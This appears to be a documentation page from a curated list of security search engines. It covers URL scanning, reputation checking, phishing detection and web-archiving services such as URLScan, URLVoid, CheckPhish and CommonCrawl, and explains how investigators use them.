Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/edoardottt/awesome-hacker-search-engines/llms.txt

Use this file to discover all available pages before exploring further.

URL scanning and reputation tools form a critical layer of defense in security research, threat investigation, and incident response. When a suspicious link appears in a phishing email, a malware sample, or a threat intelligence feed, URL analysis tools can safely detonate it in a sandbox, check it against threat databases, reveal its hosting infrastructure, and expose the content it serves — all without risking infection of a production machine. Beyond malware detection, these tools support web archiving (recovering deleted or changed content), phishing detection (identifying fraudulent lookalike pages), backlink analysis (mapping domain relationships), and URL enumeration (discovering all URLs associated with a target domain).

PhoneBook

Lists all domains, email addresses, or URLs for the given input domain — excellent for URL enumeration.

IntelligenceX

Search engine and data archive — indexes URLs across historical and leaked datasets.

URLScan

A sandbox for the web — submit any URL to scan and analyze its behavior, resources, and redirects.

HackerTarget

Collect information about IP Addresses, Networks, Web Pages and DNS records.

MOZ Link Explorer

The world’s best backlink checker with over 40 trillion links — map domain link relationships.

shorteners.grayhatwarfare.com

Search URLs exposed by Shortener services — unshorten and investigate obfuscated links.

CommonCrawl Index

Open repository of web crawl data — query the index to find all crawled URLs for a domain.

URLVoid

Check the online reputation/safety of a website against multiple threat databases.

Norton SafeWeb

Look up a site, Get our rating — Norton’s web safety and reputation scoring.

CheckPhish

Real-time URL and website scanner — specializes in phishing page detection.

web-check.xyz

All-in-one OSINT tool for quickly checking a website’s data — headers, DNS, certs, and more.

TinyScan

Effortlessly Dive into URL Details — scan and analyze URLs for metadata and content.

urldna.io

Unleash website insights — analyzes data, monitors brands and exposes security risks.

URL Reputation, Phishing Detection & Web Archiving

URL Reputation Checking

Reputation tools like URLVoid and Norton SafeWeb cross-reference a URL against dozens of threat intelligence feeds, blocklists, and anti-phishing databases simultaneously. This multi-engine approach dramatically reduces false negatives — a URL may be clean on one feed but flagged as phishing on another. During incident response, URL reputation checking is one of the first steps when investigating a suspicious link that appeared in a phishing campaign, malware C2 beacon, or user-reported email.

Phishing Detection & Analysis

Phishing pages are increasingly sophisticated — they use valid TLS certificates, mimic legitimate login pages, and often evade simple URL blocklists by using URL shorteners, redirectors, or compromised legitimate domains. Tools like CheckPhish use visual similarity analysis and content-based heuristics to detect phishing pages that reputation databases haven’t yet catalogued. URLScan goes further by rendering the page in a headless browser, capturing screenshots, recording all network requests, and logging the full DOM — giving analysts a complete picture of what a suspicious URL does when visited.

Web Archiving in Security Research

Web archiving tools serve several distinct purposes in security investigations:
  • Evidence preservation: archiving a phishing page or defaced website before it goes offline
  • Historical analysis: understanding what a domain served before it was weaponized
  • Deleted content recovery: retrieving pages that an organization or attacker has removed
  • Change detection: comparing current and historical content to identify when a compromise or modification occurred
The CommonCrawl Index is particularly valuable for URL enumeration — by querying *.example.com, researchers can retrieve every URL that the Common Crawl bot ever indexed for a domain, often revealing endpoints, API paths, and pages not linked from the main site.

Build docs developers (and LLMs) love